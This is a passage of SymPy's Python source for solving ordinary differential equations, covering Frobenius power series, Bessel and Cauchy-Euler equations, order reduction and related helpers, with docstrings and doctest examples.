arg = - b/cbrt(-m)**2 + cbrt(-m)*x
else:
arg = - b/cbrt(-m)**2 + cbrt(-m)*x
return Eq(f(x), C0*airyai(arg) + C1*airybi(arg))
def ode_2nd_power_series_regular(eq, func, order, match):
r"""
Gives a power series solution to a second order homogeneous differential
equation with polynomial coefficients at a regular point. A second order
homogeneous differential equation is of the form
.. math :: P(x)\frac{d^2y}{dx^2} + Q(x)\frac{dy}{dx} + R(x) = 0
    A point is said to be a regular singular point at `x0` if `(x - x0)\frac{Q(x)}{P(x)}`
and `(x - x0)^{2}\frac{R(x)}{P(x)}` are analytic at `x0`. For simplicity
`P(x)`, `Q(x)` and `R(x)` are assumed to be polynomials. The algorithm for
finding the power series solutions is:
    1. Try expressing `(x - x0)\frac{Q(x)}{P(x)}` and `(x - x0)^{2}\frac{R(x)}{P(x)}` as power
    series about `x0`. Find `p0` and `q0`, which are the constant terms of these
    power series expansions.
2. Solve the indicial equation `f(m) = m(m - 1) + m*p0 + q0`, to obtain the
roots `m1` and `m2` of the indicial equation.
    3. If `m1 - m2` is not an integer, there exist two series solutions. If
`m1 = m2`, there exists only one solution. If `m1 - m2` is an integer,
then the existence of one solution is confirmed. The other solution may
or may not exist.
The power series solution is of the form `x^{m}\sum_{n=0}^\infty a_{n}x^{n}`. The
coefficients are determined by the following recurrence relation.
    `a_{n} = -\frac{\sum_{k=0}^{n-1} \left(q_{n-k} + (m + k)p_{n-k}\right) a_{k}}{f(m + n)}`. For the case
    in which `m1 - m2` is an integer, it can be seen from the recurrence relation
    that for the lower root `m`, when `n` equals the difference of both the
    roots, the denominator becomes zero. A second series solution then exists
    only if the numerator also vanishes at that step.
Examples
========
>>> from sympy import dsolve, Function, pprint
>>> from sympy.abc import x
>>> f = Function("f")
>>> eq = x*(f(x).diff(x, 2)) + 2*(f(x).diff(x)) + x*f(x)
>>> pprint(dsolve(eq, hint='2nd_power_series_regular'))
/ 6 4 2 \
| x x x |
/ 4 2 \ C1*|- --- + -- - -- + 1|
| x x | \ 720 24 2 / / 6\
f(x) = C2*|--- - -- + 1| + ------------------------ + O\x /
\120 6 / x
References
==========
    - George F. Simmons, "Differential Equations with Applications and
      Historical Notes", pp. 176 - 184
"""
x = func.args[0]
f = func.func
C0, C1 = get_numbered_constants(eq, num=2)
m = Dummy("m") # for solving the indicial equation
x0 = match.get('x0')
terms = match.get('terms', 5)
p = match['p']
q = match['q']
# Generating the indicial equation
indicial = []
for term in [p, q]:
if not term.has(x):
indicial.append(term)
else:
term = series(term, n=1, x0=x0)
if isinstance(term, Order):
indicial.append(S.Zero)
else:
for arg in term.args:
if not arg.has(x):
indicial.append(arg)
break
p0, q0 = indicial
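    # p0 and q0 are the constant terms of the series for p and q; the indicial
    # equation solved next is m*(m - 1) + m*p0 + q0 = 0. For the docstring
    # example x*f'' + 2*f' + x*f = 0 about x0 = 0 this is (roughly)
    # m*(m - 1) + 2*m = 0, whose roots 0 and -1 explain the 1/x factor in one
    # of the two series.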
sollist = solve(m*(m - 1) + m*p0 + q0, m)
if sollist and isinstance(sollist, list) and all(
[sol.is_real for sol in sollist]):
serdict1 = {}
serdict2 = {}
if len(sollist) == 1:
# Only one series solution exists in this case.
m1 = m2 = sollist.pop()
if terms-m1-1 <= 0:
return Eq(f(x), Order(terms))
serdict1 = _frobenius(terms-m1-1, m1, p0, q0, p, q, x0, x, C0)
else:
m1 = sollist[0]
m2 = sollist[1]
if m1 < m2:
m1, m2 = m2, m1
# Irrespective of whether m1 - m2 is an integer or not, one
# Frobenius series solution exists.
serdict1 = _frobenius(terms-m1-1, m1, p0, q0, p, q, x0, x, C0)
if not (m1 - m2).is_integer:
# Second frobenius series solution exists.
serdict2 = _frobenius(terms-m2-1, m2, p0, q0, p, q, x0, x, C1)
else:
# Check if second frobenius series solution exists.
serdict2 = _frobenius(terms-m2-1, m2, p0, q0, p, q, x0, x, C1, check=m1)
if serdict1:
finalseries1 = C0
for key in serdict1:
power = int(key.name[1:])
finalseries1 += serdict1[key]*(x - x0)**power
finalseries1 = (x - x0)**m1*finalseries1
finalseries2 = S.Zero
if serdict2:
for key in serdict2:
power = int(key.name[1:])
finalseries2 += serdict2[key]*(x - x0)**power
finalseries2 += C1
finalseries2 = (x - x0)**m2*finalseries2
return Eq(f(x), collect(finalseries1 + finalseries2,
[C0, C1]) + Order(x**terms))
def ode_2nd_linear_bessel(eq, func, order, match):
r"""
Gives solution of the Bessel differential equation
    .. math :: x^2 \frac{d^2y}{dx^2} + x \frac{dy}{dx} + (x^2 - n^2) y(x) = 0
    If `n` is an integer, the solution is returned in the form
    ``Eq(f(x), C0*besselj(n, x) + C1*bessely(n, x))``, since these two solutions
    are linearly independent. If `n` is not an integer, the solution may instead
    be written as ``Eq(f(x), C0*besselj(n, x) + C1*besselj(-n, x))``, which can
    also be transformed into the ``besselj``/``bessely`` form above.
Examples
========
>>> from sympy.abc import x
>>> from sympy import Symbol
>>> v = Symbol('v', positive=True)
>>> from sympy.solvers.ode import dsolve
>>> from sympy import Function
>>> f = Function('f')
>>> y = f(x)
>>> genform = x**2*y.diff(x, 2) + x*y.diff(x) + (x**2 - v**2)*y
>>> dsolve(genform)
Eq(f(x), C1*besselj(v, x) + C2*bessely(v, x))
References
==========
    - https://www.math24.net/bessel-differential-equation/
"""
x = func.args[0]
f = func.func
C0, C1 = get_numbered_constants(eq, num=2)
n = match['n']
a4 = match['a4']
c4 = match['c4']
d4 = match['d4']
b4 = match['b4']
n = sqrt(n**2 + Rational(1, 4)*(c4 - 1)**2)
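    # For the plain Bessel equation x**2*f'' + x*f' + (x**2 - v**2)*f = 0 the
    # match (roughly) gives a4 = d4 = 1, b4 = 0, c4 = 1, so the prefactor
    # x**((1 - c4)/2) is 1 and the return value reduces to the docstring output
    # C1*besselj(v, x) + C2*bessely(v, x).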
return Eq(f(x), ((x**(Rational(1-c4,2)))*(C0*besselj(n/d4,a4*x**d4/d4)
+ C1*bessely(n/d4,a4*x**d4/d4))).subs(x, x-b4))
def _frobenius(n, m, p0, q0, p, q, x0, x, c, check=None):
r"""
    Returns a dict with the series coefficients as keys and their values, expressed in terms of C0, as values
"""
n = int(n)
# In cases where m1 - m2 is not an integer
m2 = check
d = Dummy("d")
numsyms = numbered_symbols("C", start=0)
numsyms = [next(numsyms) for i in range(n + 1)]
serlist = []
for ser in [p, q]:
# Order term not present
if ser.is_polynomial(x) and Poly(ser, x).degree() <= n:
if x0:
ser = ser.subs(x, x + x0)
dict_ = Poly(ser, x).as_dict()
# Order term present
else:
tseries = series(ser, x=x0, n=n+1)
# Removing order
dict_ = Poly(list(ordered(tseries.args))[: -1], x).as_dict()
# Fill in with zeros, if coefficients are zero.
for i in range(n + 1):
if (i,) not in dict_:
dict_[(i,)] = S.Zero
serlist.append(dict_)
pseries = serlist[0]
qseries = serlist[1]
indicial = d*(d - 1) + d*p0 + q0
frobdict = {}
for i in range(1, n + 1):
num = c*(m*pseries[(i,)] + qseries[(i,)])
for j in range(1, i):
sym = Symbol("C" + str(j))
num += frobdict[sym]*((m + j)*pseries[(i - j,)] + qseries[(i - j,)])
        # Checking for cases when m1 - m2 is an integer. If num is not zero
        # then a second Frobenius series solution cannot be found. If num equals
        # zero then set the constant to zero and proceed.
if m2 is not None and i == m2 - m:
if num:
return False
else:
frobdict[numsyms[i]] = S.Zero
else:
frobdict[numsyms[i]] = -num/(indicial.subs(d, m+i))
return frobdict
def _nth_order_reducible_match(eq, func):
r"""
Matches any differential equation that can be rewritten with a smaller
order. Only derivatives of ``func`` alone, wrt a single variable,
are considered, and only in them should ``func`` appear.
"""
# ODE only handles functions of 1 variable so this affirms that state
assert len(func.args) == 1
x = func.args[0]
vc = [d.variable_count[0] for d in eq.atoms(Derivative)
if d.expr == func and len(d.variable_count) == 1]
ords = [c for v, c in vc if v == x]
if len(ords) < 2:
return
smallest = min(ords)
# make sure func does not appear outside of derivatives
D = Dummy()
if eq.subs(func.diff(x, smallest), D).has(func):
return
return {'n': smallest}
def ode_nth_order_reducible(eq, func, order, match):
r"""
Solves ODEs that only involve derivatives of the dependent variable using
a substitution of the form `f^n(x) = g(x)`.
For example any second order ODE of the form `f''(x) = h(f'(x), x)` can be
transformed into a pair of 1st order ODEs `g'(x) = h(g(x), x)` and
`f'(x) = g(x)`. Usually the 1st order ODE for `g` is easier to solve. If
that gives an explicit solution for `g` then `f` is found simply by
integration.
Examples
========
>>> from sympy import Function, dsolve, Eq
>>> from sympy.abc import x
>>> f = Function('f')
>>> eq = Eq(x*f(x).diff(x)**2 + f(x).diff(x, 2), 0)
>>> dsolve(eq, f(x), hint='nth_order_reducible')
... # doctest: +NORMALIZE_WHITESPACE
Eq(f(x), C1 - sqrt(-1/C2)*log(-C2*sqrt(-1/C2) + x) + sqrt(-1/C2)*log(C2*sqrt(-1/C2) + x))
"""
x = func.args[0]
f = func.func
n = match['n']
# get a unique function name for g
names = [a.name for a in eq.atoms(AppliedUndef)]
while True:
name = Dummy().name
if name not in names:
g = Function(name)
break
w = f(x).diff(x, n)
geq = eq.subs(w, g(x))
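    # Sketch of the reduction: for the docstring example
    # x*f'(x)**2 + f''(x) = 0 we have n = 1, so w = f'(x) and geq is (roughly)
    # x*g(x)**2 + g'(x) = 0, a first order ODE for g that is solved below and
    # then integrated back to recover f.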
gsol = dsolve(geq, g(x))
if not isinstance(gsol, list):
gsol = [gsol]
# Might be multiple solutions to the reduced ODE:
fsol = []
for gsoli in gsol:
fsoli = dsolve(gsoli.subs(g(x), w), f(x)) # or do integration n times
fsol.append(fsoli)
if len(fsol) == 1:
fsol = fsol[0]
return fsol
def _remove_redundant_solutions(eq, solns, order, var):
r"""
Remove redundant solutions from the set of solutions.
This function is needed because otherwise dsolve can return
redundant solutions. As an example consider:
eq = Eq((f(x).diff(x, 2))*f(x).diff(x), 0)
There are two ways to find solutions to eq. The first is to solve f(x).diff(x, 2) = 0
leading to solution f(x)=C1 + C2*x. The second is to solve the equation f(x).diff(x) = 0
leading to the solution f(x) = C1. In this particular case we then see
that the second solution is a special case of the first and we don't
want to return it.
This does not always happen. If we have
eq = Eq((f(x)**2-4)*(f(x).diff(x)-4), 0)
then we get the algebraic solution f(x) = [-2, 2] and the integral solution
f(x) = x + C1 and in this case the two solutions are not equivalent wrt
initial conditions so both should be returned.
"""
def is_special_case_of(soln1, soln2):
return _is_special_case_of(soln1, soln2, eq, order, var)
unique_solns = []
for soln1 in solns:
for soln2 in unique_solns[:]:
if is_special_case_of(soln1, soln2):
break
elif is_special_case_of(soln2, soln1):
unique_solns.remove(soln2)
else:
unique_solns.append(soln1)
return unique_solns
def _is_special_case_of(soln1, soln2, eq, order, var):
r"""
True if soln1 is found to be a special case of soln2 wrt some value of the
constants that appear in soln2. False otherwise.
"""
# The solutions returned by dsolve may be given explicitly or implicitly.
# We will equate the sol1=(soln1.rhs - soln1.lhs), sol2=(soln2.rhs - soln2.lhs)
# of the two solutions.
#
# Since this is supposed to hold for all x it also holds for derivatives.
# For an order n ode we should be able to differentiate
# each solution n times to get n+1 equations.
#
# We then try to solve those n+1 equations for the integrations constants
# in sol2. If we can find a solution that doesn't depend on x then it
# means that some value of the constants in sol1 is a special case of
# sol2 corresponding to a particular choice of the integration constants.
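    # For example (see _remove_redundant_solutions above), f(x) = C1 is obtained
    # from f(x) = C1 + C2*x by the constant choice C2 = 0, so the solve() below
    # finds an x-free solution for the constants and the first solution is
    # reported as a special case of the second.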
# In case the solution is in implicit form we subtract the sides
soln1 = soln1.rhs - soln1.lhs
soln2 = soln2.rhs - soln2.lhs
# Work for the series solution
if soln1.has(Order) and soln2.has(Order):
if soln1.getO() == soln2.getO():
soln1 = soln1.removeO()
soln2 = soln2.removeO()
else:
return False
elif soln1.has(Order) or soln2.has(Order):
return False
constants1 = soln1.free_symbols.difference(eq.free_symbols)
constants2 = soln2.free_symbols.difference(eq.free_symbols)
constants1_new = get_numbered_constants(Tuple(soln1, soln2), len(constants1))
if len(constants1) == 1:
constants1_new = {constants1_new}
for c_old, c_new in zip(constants1, constants1_new):
soln1 = soln1.subs(c_old, c_new)
# n equations for sol1 = sol2, sol1'=sol2', ...
lhs = soln1
rhs = soln2
eqns = [Eq(lhs, rhs)]
for n in range(1, order):
lhs = lhs.diff(var)
rhs = rhs.diff(var)
eq = Eq(lhs, rhs)
eqns.append(eq)
# BooleanTrue/False awkwardly show up for trivial equations
if any(isinstance(eq, BooleanFalse) for eq in eqns):
return False
eqns = [eq for eq in eqns if not isinstance(eq, BooleanTrue)]
try:
constant_solns = solve(eqns, constants2)
except NotImplementedError:
return False
# Sometimes returns a dict and sometimes a list of dicts
if isinstance(constant_solns, dict):
constant_solns = [constant_solns]
# after solving the issue 17418, maybe we don't need the following checksol code.
for constant_soln in constant_solns:
for eq in eqns:
eq=eq.rhs-eq.lhs
if checksol(eq, constant_soln) is not True:
return False
# If any solution gives all constants as expressions that don't depend on
# x then there exists constants for soln2 that give soln1
for constant_soln in constant_solns:
if not any(c.has(var) for c in constant_soln.values()):
return True
return False
def _nth_linear_match(eq, func, order):
r"""
Matches a differential equation to the linear form:
.. math:: a_n(x) y^{(n)} + \cdots + a_1(x)y' + a_0(x) y + B(x) = 0
Returns a dict of order:coeff terms, where order is the order of the
derivative on each term, and coeff is the coefficient of that derivative.
The key ``-1`` holds the function `B(x)`. Returns ``None`` if the ODE is
not linear. This function assumes that ``func`` has already been checked
to be good.
Examples
========
>>> from sympy import Function, cos, sin
>>> from sympy.abc import x
>>> from sympy.solvers.ode.ode import _nth_linear_match
>>> f = Function('f')
>>> _nth_linear_match(f(x).diff(x, 3) + 2*f(x).diff(x) +
... x*f(x).diff(x, 2) + cos(x)*f(x).diff(x) + x - f(x) -
... sin(x), f(x), 3)
{-1: x - sin(x), 0: -1, 1: cos(x) + 2, 2: x, 3: 1}
>>> _nth_linear_match(f(x).diff(x, 3) + 2*f(x).diff(x) +
... x*f(x).diff(x, 2) + cos(x)*f(x).diff(x) + x - f(x) -
... sin(f(x)), f(x), 3) == None
True
"""
x = func.args[0]
one_x = {x}
terms = {i: S.Zero for i in range(-1, order + 1)}
for i in Add.make_args(eq):
if not i.has(func):
terms[-1] += i
else:
c, f = i.as_independent(func)
if (isinstance(f, Derivative)
and set(f.variables) == one_x
and f.args[0] == func):
terms[f.derivative_count] += c
elif f == func:
terms[len(f.args[1:])] += c
else:
return None
return terms
def ode_nth_linear_euler_eq_homogeneous(eq, func, order, match, returns='sol'):
r"""
Solves an `n`\th order linear homogeneous variable-coefficient
Cauchy-Euler equidimensional ordinary differential equation.
This is an equation with form `0 = a_0 f(x) + a_1 x f'(x) + a_2 x^2 f''(x)
\cdots`.
These equations can be solved in a general manner, by substituting
solutions of the form `f(x) = x^r`, and deriving a characteristic equation
for `r`. When there are repeated roots, we include extra terms of the
form `C_{r k} \ln^k(x) x^r`, where `C_{r k}` is an arbitrary integration
constant, `r` is a root of the characteristic equation, and `k` ranges
over the multiplicity of `r`. In the cases where the roots are complex,
solutions of the form `C_1 x^a \sin(b \log(x)) + C_2 x^a \cos(b \log(x))`
are returned, based on expansions with Euler's formula. The general
solution is the sum of the terms found. If SymPy cannot find exact roots
to the characteristic equation, a
:py:obj:`~.ComplexRootOf` instance will be returned
instead.
>>> from sympy import Function, dsolve
>>> from sympy.abc import x
>>> f = Function('f')
>>> dsolve(4*x**2*f(x).diff(x, 2) + f(x), f(x),
... hint='nth_linear_euler_eq_homogeneous')
... # doctest: +NORMALIZE_WHITESPACE
Eq(f(x), sqrt(x)*(C1 + C2*log(x)))
Note that because this method does not involve integration, there is no
``nth_linear_euler_eq_homogeneous_Integral`` hint.
The following is for internal use:
- ``returns = 'sol'`` returns the solution to the ODE.
- ``returns = 'list'`` returns a list of linearly independent solutions,
corresponding to the fundamental solution set, for use with non
homogeneous solution methods like variation of parameters and
undetermined coefficients. Note that, though the solutions should be
linearly independent, this function does not explicitly check that. You
can do ``assert simplify(wronskian(sollist)) != 0`` to check for linear
independence. Also, ``assert len(sollist) == order`` will need to pass.
- ``returns = 'both'``, return a dictionary ``{'sol': <solution to ODE>,
'list': <list of linearly independent solutions>}``.
Examples
========
>>> from sympy import Function, dsolve, pprint
>>> from sympy.abc import x
>>> f = Function('f')
>>> eq = f(x).diff(x, 2)*x**2 - 4*f(x).diff(x)*x + 6*f(x)
>>> pprint(dsolve(eq, f(x),
... hint='nth_linear_euler_eq_homogeneous'))
2
f(x) = x *(C1 + C2*x)
References
==========
- https://en.wikipedia.org/wiki/Cauchy%E2%80%93Euler_equation
- C. Bender & S. Orszag, "Advanced Mathematical Methods for Scientists and
Engineers", Springer 1999, pp. 12
# indirect doctest
"""
# XXX: This global collectterms hack should be removed.
global collectterms
collectterms = []
x = func.args[0]
f = func.func
r = match
# First, set up characteristic equation.
chareq, symbol = S.Zero, Dummy('x')
for i in r.keys():
if not isinstance(i, str) and i >= 0:
chareq += (r[i]*diff(x**symbol, x, i)*x**-symbol).expand()
chareq = Poly(chareq, symbol)
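    # Note: diff(x**m, x, i)*x**(-m) is the falling factorial m*(m - 1)*...*(m - i + 1),
    # so e.g. x**2*f'' - 4*x*f' + 6*f = 0 yields the characteristic polynomial
    # m*(m - 1) - 4*m + 6 = (m - 2)*(m - 3), matching the x**2*(C1 + C2*x)
    # solution in the docstring example.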
chareqroots = [rootof(chareq, k) for k in range(chareq.degree())]
# A generator of constants
constants = list(get_numbered_constants(eq, num=chareq.degree()*2))
constants.reverse()
# Create a dict root: multiplicity or charroots
charroots = defaultdict(int)
for root in chareqroots:
charroots[root] += 1
gsol = S.Zero
# We need keep track of terms so we can run collect() at the end.
# This is necessary for constantsimp to work properly.
ln = log
for root, multiplicity in charroots.items():
for i in range(multiplicity):
if isinstance(root, RootOf):
gsol += (x**root) * constants.pop()
if multiplicity != 1:
raise ValueError("Value should be 1")
collectterms = [(0, root, 0)] + collectterms
elif root.is_real:
gsol += ln(x)**i*(x**root) * constants.pop()
collectterms = [(i, root, 0)] + collectterms
else:
reroot = re(root)
imroot = im(root)
gsol += ln(x)**i * (x**reroot) * (
constants.pop() * sin(abs(imroot)*ln(x))
+ constants.pop() * cos(imroot*ln(x)))
# Preserve ordering (multiplicity, real part, imaginary part)
# It will be assumed implicitly when constructing
# fundamental solution sets.
collectterms = [(i, reroot, imroot)] + collectterms
if returns == 'sol':
return Eq(f(x), gsol)
    elif returns in ('list', 'both'):
# HOW TO TEST THIS CODE? (dsolve does not pass 'returns' through)
# Create a list of (hopefully) linearly independent solutions
gensols = []
# Keep track of when to use sin or cos for nonzero imroot
for i, reroot, imroot in collectterms:
if imroot == 0:
gensols.append(ln(x)**i*x**reroot)
else:
sin_form = ln(x)**i*x**reroot*sin(abs(imroot)*ln(x))
if sin_form in gensols:
cos_form = ln(x)**i*x**reroot*cos(imroot*ln(x))
gensols.append(cos_form)
else:
gensols.append(sin_form)
if returns == 'list':
return gensols
else:
return {'sol': Eq(f(x), gsol), 'list': gensols}
else:
raise ValueError('Unknown value for key "returns".')
def ode_nth_linear_euler_eq_nonhomogeneous_undetermined_coefficients(eq, func, order, match, returns='sol'):
r"""
Solves an `n`\th order linear non homogeneous Cauchy-Euler equidimensional
ordinary differential equation using undetermined coefficients.
This is an equation with form `g(x) = a_0 f(x) + a_1 x f'(x) + a_2 x^2 f''(x)
\cdots`.
    These equations can be solved in a general manner, by substituting
    `x = exp(t)`, which turns the equation into a constant-coefficient equation
    of the form `g(exp(t)) = b_0 f(t) + b_1 f'(t) + b_2 f''(t) \cdots`, which can
    then be solved by ``nth_linear_constant_coeff_undetermined_coefficients``,
    provided `g(exp(t))` has a finite number of linearly independent derivatives.
    Functions that fit this requirement are finite sums of functions of the form
`a x^i e^{b x} \sin(c x + d)` or `a x^i e^{b x} \cos(c x + d)`, where `i`
is a non-negative integer and `a`, `b`, `c`, and `d` are constants. For
example any polynomial in `x`, functions like `x^2 e^{2 x}`, `x \sin(x)`,
and `e^x \cos(x)` can all be used. Products of `\sin`'s and `\cos`'s have
a finite number of derivatives, because they can be expanded into `\sin(a
x)` and `\cos(b x)` terms. However, SymPy currently cannot do that
expansion, so you will need to manually rewrite the expression in terms of
the above to use this method. So, for example, you will need to manually
convert `\sin^2(x)` into `(1 + \cos(2 x))/2` to properly apply the method
of undetermined coefficients on it.
    After replacement of x by exp(t), this method works by creating a trial function
    from the expression and all of its linearly independent derivatives and
    substituting them into the original ODE. The coefficients of each term
    then satisfy a system of linear equations, which is solved for and
    substituted, giving the solution. If any of the trial functions are linearly
dependent on the solution to the homogeneous equation, they are multiplied
by sufficient `x` to make them linearly independent.
Examples
========
>>> from sympy import dsolve, Function, Derivative, log
>>> from sympy.abc import x
>>> f = Function('f')
>>> eq = x**2*Derivative(f(x), x, x) - 2*x*Derivative(f(x), x) + 2*f(x) - log(x)
>>> dsolve(eq, f(x),
... hint='nth_linear_euler_eq_nonhomogeneous_undetermined_coefficients').expand()
Eq(f(x), C1*x + C2*x**2 + log(x)/2 + 3/4)
"""
x = func.args[0]
f = func.func
r = match
chareq, eq, symbol = S.Zero, S.Zero, Dummy('x')
for i in r.keys():
if not isinstance(i, str) and i >= 0:
chareq += (r[i]*diff(x**symbol, x, i)*x**-symbol).expand()
for i in range(1,degree(Poly(chareq, symbol))+1):
eq += chareq.coeff(symbol**i)*diff(f(x), x, i)
if chareq.as_coeff_add(symbol)[0]:
eq += chareq.as_coeff_add(symbol)[0]*f(x)
e, re = posify(r[-1].subs(x, exp(x)))
eq += e.subs(re)
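    # At this point `eq` is the transformed constant-coefficient ODE in the new
    # variable t = log(x) (the symbol x is reused for t). For the docstring
    # example x**2*f'' - 2*x*f' + 2*f - log(x), this works out (roughly) to
    # f''(x) - 3*f'(x) + 2*f(x) - x, which undetermined coefficients can handle.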
match = _nth_linear_match(eq, f(x), ode_order(eq, f(x)))
eq_homogeneous = Add(eq,-match[-1])
match['trialset'] = _undetermined_coefficients_match(match[-1], x, func, eq_homogeneous)['trialset']
return ode_nth_linear_constant_coeff_undetermined_coefficients(eq, func, order, match).subs(x, log(x)).subs(f(log(x)), f(x)).expand()
def ode_nth_linear_euler_eq_nonhomogeneous_variation_of_parameters(eq, func, order, match, returns='sol'):
r"""
Solves an `n`\th order linear non homogeneous Cauchy-Euler equidimensional
ordinary differential equation using variation of parameters.
This is an equation with form `g(x) = a_0 f(x) + a_1 x f'(x) + a_2 x^2 f''(x)
\cdots`.
This method works by assuming that the particular solution takes the form
    .. math:: \sum_{i=1}^{n} c_i(x) y_i(x) a_n x^{n} \text{,}
    where `y_i` is the `i`\th solution to the homogeneous equation. The
    coefficients `c_i(x)` are then found using Wronskians and Cramer's rule. The
    particular solution is given by multiplying the expression below by `a_n x^{n}`
    .. math:: \sum_{i=1}^n \left( \int \frac{W_i(x)}{W(x)} \,dx
\right) y_i(x) \text{,}
where `W(x)` is the Wronskian of the fundamental system (the system of `n`
linearly independent solutions to the homogeneous equation), and `W_i(x)`
is the Wronskian of the fundamental system with the `i`\th column replaced
with `[0, 0, \cdots, 0, \frac{x^{- n}}{a_n} g{\left(x \right)}]`.
This method is general enough to solve any `n`\th order inhomogeneous
linear differential equation, but sometimes SymPy cannot simplify the
Wronskian well enough to integrate it. If this method hangs, try using the
``nth_linear_constant_coeff_variation_of_parameters_Integral`` hint and
simplifying the integrals manually. Also, prefer using
``nth_linear_constant_coeff_undetermined_coefficients`` when it
applies, because it doesn't use integration, making it faster and more
reliable.
Warning, using simplify=False with
'nth_linear_constant_coeff_variation_of_parameters' in
:py:meth:`~sympy.solvers.ode.dsolve` may cause it to hang, because it will
not attempt to simplify the Wronskian before integrating. It is
recommended that you only use simplify=False with
'nth_linear_constant_coeff_variation_of_parameters_Integral' for this
method, especially if the solution to the homogeneous equation has
trigonometric functions in it.
Examples
========
>>> from sympy import Function, dsolve, Derivative
>>> from sympy.abc import x
>>> f = Function('f')
>>> eq = x**2*Derivative(f(x), x, x) - 2*x*Derivative(f(x), x) + 2*f(x) - x**4
>>> dsolve(eq, f(x),
... hint='nth_linear_euler_eq_nonhomogeneous_variation_of_parameters').expand()
Eq(f(x), C1*x + C2*x**2 + x**4/6)
"""
x = func.args[0]
f = func.func
r = match
gensol = ode_nth_linear_euler_eq_homogeneous(eq, func, order, match, returns='both')
match.update(gensol)
r[-1] = r[-1]/r[ode_order(eq, f(x))]
sol = _solve_variation_of_parameters(eq, func, order, match)
return Eq(f(x), r['sol'].rhs + (sol.rhs - r['sol'].rhs)*r[ode_order(eq, f(x))])
def _linear_coeff_match(expr, func):
r"""
Helper function to match hint ``linear_coefficients``.
Matches the expression to the form `(a_1 x + b_1 f(x) + c_1)/(a_2 x + b_2
f(x) + c_2)` where the following conditions hold:
1. `a_1`, `b_1`, `c_1`, `a_2`, `b_2`, `c_2` are Rationals;
2. `c_1` or `c_2` are not equal to zero;
3. `a_2 b_1 - a_1 b_2` is not equal to zero.
Return ``xarg``, ``yarg`` where
1. ``xarg`` = `(b_2 c_1 - b_1 c_2)/(a_2 b_1 - a_1 b_2)`
2. ``yarg`` = `(a_1 c_2 - a_2 c_1)/(a_2 b_1 - a_1 b_2)`
Examples
========
>>> from sympy import Function
>>> from sympy.abc import x
>>> from sympy.solvers.ode.ode import _linear_coeff_match
>>> from sympy.functions.elementary.trigonometric import sin
>>> f = Function('f')
>>> _linear_coeff_match((
... (-25*f(x) - 8*x + 62)/(4*f(x) + 11*x - 11)), f(x))
(1/9, 22/9)
>>> _linear_coeff_match(
... sin((-5*f(x) - 8*x + 6)/(4*f(x) + x - 1)), f(x))
(19/27, 2/27)
>>> _linear_coeff_match(sin(f(x)/x), f(x))
"""
f = func.func
x = func.args[0]
def abc(eq):
r'''
Internal function of _linear_coeff_match
that returns Rationals a, b, c
if eq is a*x + b*f(x) + c, else None.
'''
eq = _mexpand(eq)
c = eq.as_independent(x, f(x), as_Add=True)[0]
if not c.is_Rational:
return
a = eq.coeff(x)
if not a.is_Rational:
return
b = eq.coeff(f(x))
if not b.is_Rational:
return
if eq == a*x + b*f(x) + c:
return a, b, c
def match(arg):
r'''
Internal function of _linear_coeff_match that returns Rationals a1,
b1, c1, a2, b2, c2 and a2*b1 - a1*b2 of the expression (a1*x + b1*f(x)
+ c1)/(a2*x + b2*f(x) + c2) if one of c1 or c2 and a2*b1 - a1*b2 is
non-zero, else None.
'''
n, d = arg.together().as_numer_denom()
m = abc(n)
if m is not None:
a1, b1, c1 = m
m = abc(d)
if m is not None:
a2, b2, c2 = m
d = a2*b1 - a1*b2
if (c1 or c2) and d:
return a1, b1, c1, a2, b2, c2, d
m = [fi.args[0] for fi in expr.atoms(Function) if fi.func != f and
len(fi.args) == 1 and not fi.args[0].is_Function] or {expr}
m1 = match(m.pop())
if m1 and all(match(mi) == m1 for mi in m):
a1, b1, c1, a2, b2, c2, denom = m1
return (b2*c1 - b1*c2)/denom, (a1*c2 - a2*c1)/denom
def ode_linear_coefficients(eq, func, order, match):
r"""
Solves a differential equation with linear coefficients.
The general form of a differential equation with linear coefficients is
.. math:: y' + F\left(\!\frac{a_1 x + b_1 y + c_1}{a_2 x + b_2 y +
c_2}\!\right) = 0\text{,}
where `a_1`, `b_1`, `c_1`, `a_2`, `b_2`, `c_2` are constants and `a_1 b_2
- a_2 b_1 \ne 0`.
This can be solved by substituting:
.. math:: x = x' + \frac{b_2 c_1 - b_1 c_2}{a_2 b_1 - a_1 b_2}
y = y' + \frac{a_1 c_2 - a_2 c_1}{a_2 b_1 - a_1
b_2}\text{.}
This substitution reduces the equation to a homogeneous differential
equation.
See Also
========
:meth:`sympy.solvers.ode.ode.ode_1st_homogeneous_coeff_best`
:meth:`sympy.solvers.ode.ode.ode_1st_homogeneous_coeff_subs_indep_div_dep`
:meth:`sympy.solvers.ode.ode.ode_1st_homogeneous_coeff_subs_dep_div_indep`
Examples
========
>>> from sympy import Function, pprint
>>> from sympy.solvers.ode.ode import dsolve
>>> from sympy.abc import x
>>> f = Function('f')
>>> df = f(x).diff(x)
>>> eq = (x + f(x) + 1)*df + (f(x) - 6*x + 1)
>>> dsolve(eq, hint='linear_coefficients')
[Eq(f(x), -x - sqrt(C1 + 7*x**2) - 1), Eq(f(x), -x + sqrt(C1 + 7*x**2) - 1)]
>>> pprint(dsolve(eq, hint='linear_coefficients'))
___________ ___________
/ 2 / 2
[f(x) = -x - \/ C1 + 7*x - 1, f(x) = -x + \/ C1 + 7*x - 1]
References
==========
- Joel Moses, "Symbolic Integration - The Stormy Decade", Communications
of the ACM, Volume 14, Number 8, August 1971, pp. 558
"""
return ode_1st_homogeneous_coeff_best(eq, func, order, match)
def ode_separable_reduced(eq, func, order, match):
r"""
Solves a differential equation that can be reduced to the separable form.
The general form of this equation is
.. math:: y' + (y/x) H(x^n y) = 0\text{}.
This can be solved by substituting `u(y) = x^n y`. The equation then
reduces to the separable form `\frac{u'}{u (\mathrm{power} - H(u))} -
\frac{1}{x} = 0`.
The general solution is:
>>> from sympy import Function, dsolve, pprint
>>> from sympy.abc import x, n
>>> f, g = map(Function, ['f', 'g'])
>>> genform = f(x).diff(x) + (f(x)/x)*g(x**n*f(x))
>>> pprint(genform)
/ n \
d f(x)*g\x *f(x)/
--(f(x)) + ---------------
dx x
>>> pprint(dsolve(genform, hint='separable_reduced'))
n
x *f(x)
/
|
| 1
| ------------ dy = C1 + log(x)
| y*(n - g(y))
|
/
See Also
========
:meth:`sympy.solvers.ode.ode.ode_separable`
Examples
========
>>> from sympy import Function, pprint
>>> from sympy.solvers.ode.ode import dsolve
>>> from sympy.abc import x
>>> f = Function('f')
>>> d = f(x).diff(x)
>>> eq = (x - x**2*f(x))*d - f(x)
>>> dsolve(eq, hint='separable_reduced')
